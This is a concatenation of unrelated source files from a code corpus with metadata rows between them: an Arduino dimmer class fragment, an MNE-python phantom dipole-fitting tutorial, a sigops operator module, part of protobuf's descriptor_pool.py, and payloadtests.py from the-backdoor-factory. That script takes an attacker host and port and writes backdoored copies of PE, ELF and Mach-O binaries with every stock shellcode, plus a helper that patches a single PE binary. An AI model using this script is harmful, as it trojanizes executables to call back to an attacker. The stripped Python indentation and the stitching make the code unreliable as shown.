self.__dimmer_light_value = dimmer_light_value
self.__master_dim_id = master_dim_id
@property
def master_dim_id(self) -> Optional[int]:
return self.__master_dim_id
def perform_action(self,
pin_to_dim: Dict[str, List[IndividualDimAction]],
last_light_values_to_update: Dict[int, int],
master_state: int,
master_direction: str,
last_light_value: int):
temp_pin_actions = {}
# If master is off, start turning all lights on, regardless of button pressed or button longdown
# If cancel_on_button_release is set to true and last dim direction was down, we start dimming up
# If master_state is 100, start turning all lights off
logger.debug(f"{master_state}, {self.cancel_on_button_release}, {master_direction}")
if master_state == 0 or \
(self.cancel_on_button_release and
master_direction == constants.dim_direction_down and
master_state != 100):
# If __dimmer_light_value is configured, use that value. Otherwise use the last known value
light_value_to_set = self.__dimmer_light_value
if light_value_to_set == -1:
light_value_to_set = last_light_value
logger.debug(f"{light_value_to_set}")
# Generate dim actions for each impacted pin
for pin in self.output_pins:
if pin.parent not in temp_pin_actions:
pin_action = IndividualDimAction(self._dimmer_speed, light_value_to_set, self.delay,
self._cancel_on_button_release)
pin_action.add_pin(pin.number)
temp_pin_actions[pin.parent] = pin_action
else:
temp_pin_actions[pin.parent].add_pin(pin.number)
for key in temp_pin_actions:
if temp_pin_actions[key].has_values():
pin_to_dim.setdefault(key, []).append(temp_pin_actions[key])
# If master is on and cancel_on_button_release is false or last dim direction was up, we start dimming down
else:
if not self.cancel_on_button_release:
last_light_values_to_update.setdefault(self.master_dim_id, master_state)
for pin in self.output_pins:
if pin.parent not in temp_pin_actions:
pin_action = IndividualDimAction(self._dimmer_speed, 0, self.delay, self._cancel_on_button_release)
pin_action.add_pin(pin.number)
temp_pin_actions[pin.parent] = pin_action
else:
temp_pin_actions[pin.parent].add_pin(pin.number)
for key in temp_pin_actions:
if temp_pin_actions[key].has_values():
pin_to_dim.setdefault(key, []).append(temp_pin_actions[key])
class ArduinoConfig:
"""Represents the configuration of all known arduinos"""
def __init__(self, arduinos: List[Arduino]):
self.arduinos = arduinos
| mit | -6,083,037,248,677,932,000 | 36.250639 | 119 | 0.576141 | false |
wmvanvliet/mne-python | tutorials/sample-datasets/plot_brainstorm_phantom_elekta.py | 10 | 6588 | # -*- coding: utf-8 -*-
"""
.. _tut-brainstorm-elekta-phantom:
==========================================
Brainstorm Elekta phantom dataset tutorial
==========================================
Here we compute the evoked from raw for the Brainstorm Elekta phantom
tutorial dataset. For comparison, see :footcite:`TadelEtAl2011` and:
https://neuroimage.usc.edu/brainstorm/Tutorials/PhantomElekta
References
----------
.. footbibliography::
"""
# sphinx_gallery_thumbnail_number = 9
# Authors: Eric Larson <[email protected]>
#
# License: BSD (3-clause)
import os.path as op
import numpy as np
import matplotlib.pyplot as plt
import mne
from mne import find_events, fit_dipole
from mne.datasets.brainstorm import bst_phantom_elekta
from mne.io import read_raw_fif
print(__doc__)
###############################################################################
# The data were collected with an Elekta Neuromag VectorView system at 1000 Hz
# and low-pass filtered at 330 Hz. Here the medium-amplitude (200 nAm) data
# are read to construct instances of :class:`mne.io.Raw`.
data_path = bst_phantom_elekta.data_path(verbose=True)
subject = 'sample'
raw_fname = op.join(data_path, 'kojak_all_200nAm_pp_no_chpi_no_ms_raw.fif')
raw = read_raw_fif(raw_fname)
###############################################################################
# Data channel array consisted of 204 MEG planar gradiometers,
# 102 axial magnetometers, and 3 stimulus channels. Let's get the events
# for the phantom, where each dipole (1-32) gets its own event:
events = find_events(raw, 'STI201')
raw.plot(events=events)
raw.info['bads'] = ['MEG1933', 'MEG2421']
###############################################################################
# The data have strong line frequency (60 Hz and harmonics) and cHPI coil
# noise (five peaks around 300 Hz). Here we plot only out to 30 seconds
# to save memory:
raw.plot_psd(tmax=30., average=False)
###############################################################################
# Our phantom produces sinusoidal bursts at 20 Hz:
raw.plot(events=events)
###############################################################################
# Now we epoch our data, average it, and look at the first dipole response.
# The first peak appears around 3 ms. Because we low-passed at 40 Hz,
# we can also decimate our data to save memory.
tmin, tmax = -0.1, 0.1
bmax = -0.05 # Avoid capture filter ringing into baseline
event_id = list(range(1, 33))
epochs = mne.Epochs(raw, events, event_id, tmin, tmax, baseline=(None, bmax),
preload=False)
epochs['1'].average().plot(time_unit='s')
###############################################################################
# .. _plt_brainstorm_phantom_elekta_eeg_sphere_geometry:
#
# Let's use a :ref:`sphere head geometry model <eeg_sphere_model>`
# and let's see the coordinate alignment and the sphere location. The phantom
# is properly modeled by a single-shell sphere with origin (0., 0., 0.).
sphere = mne.make_sphere_model(r0=(0., 0., 0.), head_radius=0.08)
mne.viz.plot_alignment(epochs.info, subject=subject, show_axes=True,
bem=sphere, dig=True, surfaces='head')
###############################################################################
# Let's do some dipole fits. We first compute the noise covariance,
# then do the fits for each event_id at the fixed peak latency of the phantom
# response (36 ms, set as ``t_peak`` below).
# here we can get away with using method='oas' for speed (faster than "shrunk")
# but in general "shrunk" is usually better
cov = mne.compute_covariance(epochs, tmax=bmax)
mne.viz.plot_evoked_white(epochs['1'].average(), cov)
data = []
t_peak = 0.036 # true for Elekta phantom
for ii in event_id:
# Avoid the first and last trials -- can contain dipole-switching artifacts
evoked = epochs[str(ii)][1:-1].average().crop(t_peak, t_peak)
data.append(evoked.data[:, 0])
evoked = mne.EvokedArray(np.array(data).T, evoked.info, tmin=0.)
del epochs
dip, residual = fit_dipole(evoked, cov, sphere, n_jobs=1)
###############################################################################
# Do a quick visualization of how much variance we explained, putting the
# data and residuals on the same scale (here the "time points" are the
# 32 dipole peak values that we fit):
fig, axes = plt.subplots(2, 1)
evoked.plot(axes=axes)
for ax in axes:
ax.texts = []
for line in ax.lines:
line.set_color('#98df81')
residual.plot(axes=axes)
###############################################################################
# Now we can compare to the actual locations, taking the difference in mm:
actual_pos, actual_ori = mne.dipole.get_phantom_dipoles()
actual_amp = 100. # nAm
fig, (ax1, ax2, ax3) = plt.subplots(nrows=3, ncols=1, figsize=(6, 7))
diffs = 1000 * np.sqrt(np.sum((dip.pos - actual_pos) ** 2, axis=-1))
print('mean(position error) = %0.1f mm' % (np.mean(diffs),))
ax1.bar(event_id, diffs)
ax1.set_xlabel('Dipole index')
ax1.set_ylabel('Loc. error (mm)')
angles = np.rad2deg(np.arccos(np.abs(np.sum(dip.ori * actual_ori, axis=1))))
print(u'mean(angle error) = %0.1f°' % (np.mean(angles),))
ax2.bar(event_id, angles)
ax2.set_xlabel('Dipole index')
ax2.set_ylabel(u'Angle error (°)')
amps = actual_amp - dip.amplitude / 1e-9
print('mean(abs amplitude error) = %0.1f nAm' % (np.mean(np.abs(amps)),))
ax3.bar(event_id, amps)
ax3.set_xlabel('Dipole index')
ax3.set_ylabel('Amplitude error (nAm)')
fig.tight_layout()
plt.show()
###############################################################################
# Let's plot the positions and the orientations of the actual and the estimated
# dipoles
actual_amp = np.ones(len(dip)) # misc amp to create Dipole instance
actual_gof = np.ones(len(dip)) # misc GOF to create Dipole instance
dip_true = \
mne.Dipole(dip.times, actual_pos, actual_amp, actual_ori, actual_gof)
fig = mne.viz.plot_alignment(evoked.info, bem=sphere, surfaces='inner_skull',
coord_frame='head', meg='helmet', show_axes=True)
# Plot the position and the orientation of the actual dipole
fig = mne.viz.plot_dipole_locations(dipoles=dip_true, mode='arrow',
subject=subject, color=(0., 0., 0.),
fig=fig)
# Plot the position and the orientation of the estimated dipole
fig = mne.viz.plot_dipole_locations(dipoles=dip, mode='arrow', subject=subject,
color=(0.2, 1., 0.5), fig=fig)
mne.viz.set_3d_view(figure=fig, azimuth=70, elevation=80, distance=0.5)
| bsd-3-clause | 1,073,916,227,645,137,800 | 37.290698 | 79 | 0.601731 | false |
uvbs/the-backdoor-factory | payloadtests.py | 13 | 6022 | #!/usr/bin/env python
'''
Copyright (c) 2013-2015, Joshua Pitts
All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
3. Neither the name of the copyright holder nor the names of its contributors
may be used to endorse or promote products derived from this software without
specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.
'''
import pebin
import machobin
import elfbin
import sys
import os
def basicDiscovery(FILE):
macho_supported = ['\xcf\xfa\xed\xfe', '\xca\xfe\xba\xbe',
'\xce\xfa\xed\xfe',
]
testBinary = open(FILE, 'rb')
header = testBinary.read(4)
testBinary.close()
if 'MZ' in header:
return 'PE'
elif 'ELF' in header:
return 'ELF'
elif header in macho_supported:
return "MACHO"
else:
        print 'Only ELF, PE, and MACH-O file formats are supported'
return None
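# Illustrative helper (not part of the original script): patch a single PE
# binary with one chosen shellcode entry. The shell name must be one of the
# entries reported in flItms['avail_shells'] for that binary, and the output
# name used here is only an example.
def patchSinglePE(binary_path, host, port, shell_name):
    if basicDiscovery(binary_path) != 'PE':
        return False
    patcher = pebin.pebin(FILE=binary_path, OUTPUT='patched.' + binary_path,
                          SHELL=shell_name, HOST=host, PORT=port,
                          CAVE_JUMPING=True)
    return patcher.run_this()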
if __name__ == "__main__":
'''
Will create patched binaries for each payload for the type of binary provided.
    Each payload has its own port number.
Usage: ./payloadtests.py file 127.0.0.1 8080
'''
if len(sys.argv) != 4:
print "Will create patched binaries for each stock shellcode/payload for the "
print "type of binary provided. Each payload type has it's own port number."
print "Usage:" + str(sys.argv[0]) + " binary HOST PORT"
sys.exit()
file = sys.argv[1]
host = sys.argv[2]
port = int(sys.argv[3])
outputfiles = {}
is_supported = basicDiscovery(file)
if is_supported is "PE":
patchtypes = ['APPEND', 'JUMP', 'SINGLE']
supported_file = pebin.pebin(FILE=file, OUTPUT=None, SHELL='none')
supported_file.run_this()
#print supported_file.flItms['avail_shells']
for aShell in supported_file.flItms['avail_shells']:
for patchtype in patchtypes:
if 'cave_miner' in aShell or 'user_supplied' in aShell:
continue
aName = aShell + "." + patchtype + "." + str(host) + "." + str(port) + "." + file
print "Creating File:", aName
if patchtype == 'APPEND':
supported_file = pebin.pebin(FILE=file, OUTPUT=aName,
SHELL=aShell, HOST=host,
PORT=port, ADD_SECTION=True)
elif patchtype == 'JUMP':
supported_file = pebin.pebin(FILE=file, OUTPUT=aName,
SHELL=aShell, HOST=host,
PORT=port, CAVE_JUMPING=True)
elif patchtype == 'SINGLE':
supported_file = pebin.pebin(FILE=file, OUTPUT=aName,
SHELL=aShell, HOST=host,
PORT=port, CAVE_JUMPING=False)
result = supported_file.run_this()
outputfiles[aName] = result
port += 1
elif is_supported is "ELF":
supported_file = elfbin.elfbin(FILE=file, OUTPUT=None, SHELL='none')
supported_file.run_this()
for aShell in supported_file.avail_shells:
if 'cave_miner' in aShell or 'user_supplied' in aShell:
continue
aName = aShell + "." + str(host) + "." + str(port) + "." + file
print "Creating File:", aName
supported_file = elfbin.elfbin(FILE=file, OUTPUT=aName,
SHELL=aShell, HOST=host,
PORT=port)
result = supported_file.run_this()
outputfiles[aName] = result
port += 1
elif is_supported is "MACHO":
supported_file = machobin.machobin(FILE=file, OUTPUT=None, SHELL='none')
supported_file.run_this()
for aShell in supported_file.avail_shells:
if 'cave_miner' in aShell or 'user_supplied' in aShell:
continue
aName = aShell + "." + str(host) + "." + str(port) + "." + file
print "Creating File:", aName
supported_file = machobin.machobin(FILE=file, OUTPUT=aName,
SHELL=aShell, HOST=host,
PORT=port, FAT_PRIORITY='ALL')
result = supported_file.run_this()
outputfiles[aName] = result
port += 1
print "Successful files are in backdoored:"
for afile, aresult in outputfiles.iteritems():
if aresult is True:
print afile, 'Success'
else:
print afile, 'Fail'
os.remove('backdoored/' + afile)
| bsd-3-clause | -685,154,654,474,719,700 | 39.689189 | 97 | 0.57921 | false |
jaberg/sigops | sigops/operator.py | 1 | 6049 | import numpy as np
import itertools
from collections import defaultdict
import networkx as nx
def is_op(thing):
try:
return thing._is_sigops_operator
except AttributeError:
return False
class Operator(object):
"""Base class for operator instances understood by nengo.Simulator.
The lifetime of a Signal during one simulator timestep:
0) at most one set operator (optional)
1) any number of increments
2) any number of reads
3) at most one update
A signal that is only read can be considered a "constant".
A signal that is both set *and* updated can be a problem:
since reads must come after the set, and the set will destroy
whatever were the contents of the update, it can be the case
that the update is completely hidden and rendered irrelevant.
There are however at least two reasons to use both a set and an update:
(a) to use a signal as scratch space (updating means destroying it)
(b) to use sets and updates on partly overlapping views of the same
memory.
N.B.: It is done on purpose that there are no default values for
reads, sets, incs, and updates.
Each operator should explicitly set each of these properties.
"""
_is_sigops_operator = True
@property
def reads(self):
"""Signals that are read and not modified"""
return self._reads
@reads.setter
def reads(self, val):
self._reads = val
@property
def sets(self):
"""Signals assigned by this operator
A signal that is set here cannot be set or updated
by any other operator.
"""
return self._sets
@sets.setter
def sets(self, val):
self._sets = val
@property
def incs(self):
"""Signals incremented by this operator
Increments will be applied after this signal has been
set (if it is set), and before reads.
"""
return self._incs
@incs.setter
def incs(self, val):
self._incs = val
@property
def updates(self):
"""Signals assigned their value for time t + 1
This operator will be scheduled so that updates appear after
all sets, increments and reads of this signal.
"""
return self._updates
@updates.setter
def updates(self, val):
self._updates = val
@property
def all_signals(self):
return self.reads + self.sets + self.incs + self.updates
def init_signals(self, signals):
"""
Install any buffers into the signals view that
this operator will need. Classes for nonlinearities
that use extra buffers should create them here.
"""
for sig in self.all_signals:
if sig.base not in signals:
signals[sig.base] = np.asarray(
np.zeros(sig.base.shape, dtype=sig.base.dtype)
+ sig.base.value)
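# Illustrative sketch (not part of the original module): a minimal operator
# that copies the contents of one signal into another. Only the read/set
# declarations matter for the dependency graph below; make_step() shows one
# plausible way a simulator could execute it, assuming `signals` maps each
# base signal to the ndarray created by init_signals().
class Copy(Operator):
    def __init__(self, src, dst):
        self.src = src
        self.dst = dst
        self.reads = [src]
        self.sets = [dst]
        self.incs = []
        self.updates = []

    def __str__(self):
        return 'Copy(%s -> %s)' % (self.src, self.dst)

    def make_step(self, signals):
        src_buf = signals[self.src.base]
        dst_buf = signals[self.dst.base]

        def step():
            dst_buf[...] = src_buf
        return step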
def depgraph(operators, verbose=False):
dg = nx.DiGraph()
for op in operators:
dg.add_edges_from(itertools.product(op.reads + op.updates, [op]))
dg.add_edges_from(itertools.product([op], op.sets + op.incs))
# -- all views of a base object in a particular dictionary
by_base_writes = defaultdict(list)
by_base_reads = defaultdict(list)
reads = defaultdict(list)
sets = defaultdict(list)
incs = defaultdict(list)
ups = defaultdict(list)
for op in operators:
for node in op.sets + op.incs:
by_base_writes[node.base].append(node)
for node in op.reads:
by_base_reads[node.base].append(node)
for node in op.reads:
reads[node].append(op)
for node in op.sets:
sets[node].append(op)
for node in op.incs:
incs[node].append(op)
for node in op.updates:
ups[node].append(op)
# -- assert that only one op sets any particular view
for node in sets:
assert len(sets[node]) == 1, (node, sets[node])
# -- assert that only one op updates any particular view
for node in ups:
assert len(ups[node]) == 1, (node, ups[node])
# --- assert that any node that is incremented is also set/updated
for node in incs:
assert len(sets[node] + ups[node]) > 0, (node)
# -- assert that no two views are both set and aliased
if len(sets) >= 2:
for node, other in itertools.combinations(sets, 2):
assert not node.shares_memory_with(other), \
("%s shares memory with %s" % (node, other))
# -- assert that no two views are both updated and aliased
if len(ups) >= 2:
for node, other in itertools.combinations(ups, 2):
assert not node.shares_memory_with(other), (node, other)
# -- Scheduling algorithm for serial evaluation:
# 1) All sets on a given base signal
# 2) All incs on a given base signal
# 3) All reads on a given base signal
# 4) All updates on a given base signal
# -- incs depend on sets
for node, post_ops in incs.items():
pre_ops = list(sets[node])
for other in by_base_writes[node.base]:
pre_ops += sets[other]
dg.add_edges_from(itertools.product(set(pre_ops), post_ops))
# -- reads depend on writes (sets and incs)
for node, post_ops in reads.items():
pre_ops = sets[node] + incs[node]
for other in by_base_writes[node.base]:
pre_ops += sets[other] + incs[other]
dg.add_edges_from(itertools.product(set(pre_ops), post_ops))
# -- updates depend on reads, sets, and incs.
for node, post_ops in ups.items():
pre_ops = sets[node] + incs[node] + reads[node]
for other in by_base_writes[node.base]:
pre_ops += sets[other] + incs[other] + reads[other]
for other in by_base_reads[node.base]:
pre_ops += sets[other] + incs[other] + reads[other]
dg.add_edges_from(itertools.product(set(pre_ops), post_ops))
return dg
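# Illustrative helper (not part of the original module): once the dependency
# graph has been built, a serial execution order for one timestep can be read
# off a topological sort, keeping only the operator nodes (signals also appear
# as nodes in the graph).
def serial_schedule(operators):
    dg = depgraph(operators)
    return [node for node in nx.topological_sort(dg) if is_op(node)]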
| bsd-2-clause | -5,643,363,047,490,116,000 | 29.862245 | 75 | 0.617127 | false |
javier-ruiz-b/docker-rasppi-images | raspberry-google-home/env/lib/python3.7/site-packages/google/protobuf/descriptor_pool.py | 20 | 46541 | # Protocol Buffers - Google's data interchange format
# Copyright 2008 Google Inc. All rights reserved.
# https://developers.google.com/protocol-buffers/
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Provides DescriptorPool to use as a container for proto2 descriptors.
The DescriptorPool is used in conjunction with a DescriptorDatabase to maintain
a collection of protocol buffer descriptors for use when dynamically creating
message types at runtime.
For most applications protocol buffers should be used via modules generated by
the protocol buffer compiler tool. This should only be used when the type of
protocol buffers used in an application or library cannot be predetermined.
Below is a straightforward example on how to use this class::
pool = DescriptorPool()
file_descriptor_protos = [ ... ]
for file_descriptor_proto in file_descriptor_protos:
pool.Add(file_descriptor_proto)
my_message_descriptor = pool.FindMessageTypeByName('some.package.MessageType')
The message descriptor can be used in conjunction with the message_factory
module in order to create a protocol buffer class that can be encoded and
decoded.
If you want to get a Python class for the specified proto, use the
helper functions inside google.protobuf.message_factory
directly instead of this class.
"""
__author__ = '[email protected] (Matt Toia)'
import collections
import warnings
from google.protobuf import descriptor
from google.protobuf import descriptor_database
from google.protobuf import text_encoding
_USE_C_DESCRIPTORS = descriptor._USE_C_DESCRIPTORS # pylint: disable=protected-access
def _Deprecated(func):
"""Mark functions as deprecated."""
def NewFunc(*args, **kwargs):
warnings.warn(
        'Call to deprecated function %s(). Note: adding unlinked descriptors '
        'to the descriptor_pool is wrong. Use Add() or AddSerializedFile() '
'instead.' % func.__name__,
category=DeprecationWarning)
return func(*args, **kwargs)
NewFunc.__name__ = func.__name__
NewFunc.__doc__ = func.__doc__
NewFunc.__dict__.update(func.__dict__)
return NewFunc
def _NormalizeFullyQualifiedName(name):
"""Remove leading period from fully-qualified type name.
Due to b/13860351 in descriptor_database.py, types in the root namespace are
generated with a leading period. This function removes that prefix.
Args:
name (str): The fully-qualified symbol name.
Returns:
str: The normalized fully-qualified symbol name.
"""
return name.lstrip('.')
def _OptionsOrNone(descriptor_proto):
"""Returns the value of the field `options`, or None if it is not set."""
if descriptor_proto.HasField('options'):
return descriptor_proto.options
else:
return None
def _IsMessageSetExtension(field):
return (field.is_extension and
field.containing_type.has_options and
field.containing_type.GetOptions().message_set_wire_format and
field.type == descriptor.FieldDescriptor.TYPE_MESSAGE and
field.label == descriptor.FieldDescriptor.LABEL_OPTIONAL)
class DescriptorPool(object):
"""A collection of protobufs dynamically constructed by descriptor protos."""
if _USE_C_DESCRIPTORS:
def __new__(cls, descriptor_db=None):
# pylint: disable=protected-access
return descriptor._message.DescriptorPool(descriptor_db)
def __init__(self, descriptor_db=None):
"""Initializes a Pool of proto buffs.
The descriptor_db argument to the constructor is provided to allow
specialized file descriptor proto lookup code to be triggered on demand. An
example would be an implementation which will read and compile a file
specified in a call to FindFileByName() and not require the call to Add()
at all. Results from this database will be cached internally here as well.
Args:
descriptor_db: A secondary source of file descriptors.
"""
self._internal_db = descriptor_database.DescriptorDatabase()
self._descriptor_db = descriptor_db
self._descriptors = {}
self._enum_descriptors = {}
self._service_descriptors = {}
self._file_descriptors = {}
self._toplevel_extensions = {}
# TODO(jieluo): Remove _file_desc_by_toplevel_extension after
# maybe year 2020 for compatibility issue (with 3.4.1 only).
self._file_desc_by_toplevel_extension = {}
self._top_enum_values = {}
# We store extensions in two two-level mappings: The first key is the
# descriptor of the message being extended, the second key is the extension
# full name or its tag number.
self._extensions_by_name = collections.defaultdict(dict)
self._extensions_by_number = collections.defaultdict(dict)
def _CheckConflictRegister(self, desc, desc_name, file_name):
"""Check if the descriptor name conflicts with another of the same name.
Args:
desc: Descriptor of a message, enum, service, extension or enum value.
desc_name (str): the full name of desc.
file_name (str): The file name of descriptor.
"""
for register, descriptor_type in [
(self._descriptors, descriptor.Descriptor),
(self._enum_descriptors, descriptor.EnumDescriptor),
(self._service_descriptors, descriptor.ServiceDescriptor),
(self._toplevel_extensions, descriptor.FieldDescriptor),
(self._top_enum_values, descriptor.EnumValueDescriptor)]:
if desc_name in register:
old_desc = register[desc_name]
if isinstance(old_desc, descriptor.EnumValueDescriptor):
old_file = old_desc.type.file.name
else:
old_file = old_desc.file.name
if not isinstance(desc, descriptor_type) or (
old_file != file_name):
error_msg = ('Conflict register for file "' + file_name +
'": ' + desc_name +
' is already defined in file "' +
old_file + '". Please fix the conflict by adding '
'package name on the proto file, or use different '
'name for the duplication.')
if isinstance(desc, descriptor.EnumValueDescriptor):
error_msg += ('\nNote: enum values appear as '
'siblings of the enum type instead of '
'children of it.')
raise TypeError(error_msg)
return
def Add(self, file_desc_proto):
"""Adds the FileDescriptorProto and its types to this pool.
Args:
file_desc_proto (FileDescriptorProto): The file descriptor to add.
"""
self._internal_db.Add(file_desc_proto)
def AddSerializedFile(self, serialized_file_desc_proto):
"""Adds the FileDescriptorProto and its types to this pool.
Args:
serialized_file_desc_proto (bytes): A bytes string, serialization of the
:class:`FileDescriptorProto` to add.
"""
# pylint: disable=g-import-not-at-top
from google.protobuf import descriptor_pb2
file_desc_proto = descriptor_pb2.FileDescriptorProto.FromString(
serialized_file_desc_proto)
self.Add(file_desc_proto)
  # Adding a Descriptor to the descriptor pool is deprecated. Please use Add()
# or AddSerializedFile() to add a FileDescriptorProto instead.
@_Deprecated
def AddDescriptor(self, desc):
self._AddDescriptor(desc)
# Never call this method. It is for internal usage only.
def _AddDescriptor(self, desc):
"""Adds a Descriptor to the pool, non-recursively.
If the Descriptor contains nested messages or enums, the caller must
explicitly register them. This method also registers the FileDescriptor
associated with the message.
Args:
desc: A Descriptor.
"""
if not isinstance(desc, descriptor.Descriptor):
raise TypeError('Expected instance of descriptor.Descriptor.')
self._CheckConflictRegister(desc, desc.full_name, desc.file.name)
self._descriptors[desc.full_name] = desc
self._AddFileDescriptor(desc.file)
  # Adding an EnumDescriptor to the descriptor pool is deprecated. Please use Add()
# or AddSerializedFile() to add a FileDescriptorProto instead.
@_Deprecated
def AddEnumDescriptor(self, enum_desc):
self._AddEnumDescriptor(enum_desc)
# Never call this method. It is for internal usage only.
def _AddEnumDescriptor(self, enum_desc):
"""Adds an EnumDescriptor to the pool.
This method also registers the FileDescriptor associated with the enum.
Args:
enum_desc: An EnumDescriptor.
"""
if not isinstance(enum_desc, descriptor.EnumDescriptor):
raise TypeError('Expected instance of descriptor.EnumDescriptor.')
file_name = enum_desc.file.name
self._CheckConflictRegister(enum_desc, enum_desc.full_name, file_name)
self._enum_descriptors[enum_desc.full_name] = enum_desc
# Top enum values need to be indexed.
# Count the number of dots to see whether the enum is toplevel or nested
# in a message. We cannot use enum_desc.containing_type at this stage.
if enum_desc.file.package:
top_level = (enum_desc.full_name.count('.')
- enum_desc.file.package.count('.') == 1)
else:
top_level = enum_desc.full_name.count('.') == 0
if top_level:
file_name = enum_desc.file.name
package = enum_desc.file.package
for enum_value in enum_desc.values:
full_name = _NormalizeFullyQualifiedName(
'.'.join((package, enum_value.name)))
self._CheckConflictRegister(enum_value, full_name, file_name)
self._top_enum_values[full_name] = enum_value
self._AddFileDescriptor(enum_desc.file)
  # Adding a ServiceDescriptor to the descriptor pool is deprecated. Please use Add()
# or AddSerializedFile() to add a FileDescriptorProto instead.
@_Deprecated
def AddServiceDescriptor(self, service_desc):
self._AddServiceDescriptor(service_desc)
# Never call this method. It is for internal usage only.
def _AddServiceDescriptor(self, service_desc):
"""Adds a ServiceDescriptor to the pool.
Args:
service_desc: A ServiceDescriptor.
"""
if not isinstance(service_desc, descriptor.ServiceDescriptor):
raise TypeError('Expected instance of descriptor.ServiceDescriptor.')
self._CheckConflictRegister(service_desc, service_desc.full_name,
service_desc.file.name)
self._service_descriptors[service_desc.full_name] = service_desc
  # Adding an ExtensionDescriptor to the descriptor pool is deprecated. Please use Add()
# or AddSerializedFile() to add a FileDescriptorProto instead.
@_Deprecated
def AddExtensionDescriptor(self, extension):
self._AddExtensionDescriptor(extension)
# Never call this method. It is for internal usage only.
def _AddExtensionDescriptor(self, extension):
"""Adds a FieldDescriptor describing an extension to the pool.
Args:
extension: A FieldDescriptor.
Raises:
AssertionError: when another extension with the same number extends the
same message.
TypeError: when the specified extension is not a
descriptor.FieldDescriptor.
"""
if not (isinstance(extension, descriptor.FieldDescriptor) and
extension.is_extension):
raise TypeError('Expected an extension descriptor.')
if extension.extension_scope is None:
self._toplevel_extensions[extension.full_name] = extension
try:
existing_desc = self._extensions_by_number[
extension.containing_type][extension.number]
except KeyError:
pass
else:
if extension is not existing_desc:
raise AssertionError(
'Extensions "%s" and "%s" both try to extend message type "%s" '
'with field number %d.' %
(extension.full_name, existing_desc.full_name,
extension.containing_type.full_name, extension.number))
self._extensions_by_number[extension.containing_type][
extension.number] = extension
self._extensions_by_name[extension.containing_type][
extension.full_name] = extension
# Also register MessageSet extensions with the type name.
if _IsMessageSetExtension(extension):
self._extensions_by_name[extension.containing_type][
extension.message_type.full_name] = extension
@_Deprecated
def AddFileDescriptor(self, file_desc):
self._InternalAddFileDescriptor(file_desc)
# Never call this method. It is for internal usage only.
def _InternalAddFileDescriptor(self, file_desc):
"""Adds a FileDescriptor to the pool, non-recursively.
If the FileDescriptor contains messages or enums, the caller must explicitly
register them.
Args:
file_desc: A FileDescriptor.
"""
self._AddFileDescriptor(file_desc)
# TODO(jieluo): This is a temporary solution for FieldDescriptor.file.
# FieldDescriptor.file is added in code gen. Remove this solution after
# maybe 2020 for compatibility reason (with 3.4.1 only).
for extension in file_desc.extensions_by_name.values():
self._file_desc_by_toplevel_extension[
extension.full_name] = file_desc
def _AddFileDescriptor(self, file_desc):
"""Adds a FileDescriptor to the pool, non-recursively.
If the FileDescriptor contains messages or enums, the caller must explicitly
register them.
Args:
file_desc: A FileDescriptor.
"""
if not isinstance(file_desc, descriptor.FileDescriptor):
raise TypeError('Expected instance of descriptor.FileDescriptor.')
self._file_descriptors[file_desc.name] = file_desc
def FindFileByName(self, file_name):
"""Gets a FileDescriptor by file name.
Args:
file_name (str): The path to the file to get a descriptor for.
Returns:
FileDescriptor: The descriptor for the named file.
Raises:
KeyError: if the file cannot be found in the pool.
"""
try:
return self._file_descriptors[file_name]
except KeyError:
pass
try:
file_proto = self._internal_db.FindFileByName(file_name)
except KeyError as error:
if self._descriptor_db:
file_proto = self._descriptor_db.FindFileByName(file_name)
else:
raise error
if not file_proto:
raise KeyError('Cannot find a file named %s' % file_name)
return self._ConvertFileProtoToFileDescriptor(file_proto)
def FindFileContainingSymbol(self, symbol):
"""Gets the FileDescriptor for the file containing the specified symbol.
Args:
symbol (str): The name of the symbol to search for.
Returns:
FileDescriptor: Descriptor for the file that contains the specified
symbol.
Raises:
KeyError: if the file cannot be found in the pool.
"""
symbol = _NormalizeFullyQualifiedName(symbol)
try:
return self._InternalFindFileContainingSymbol(symbol)
except KeyError:
pass
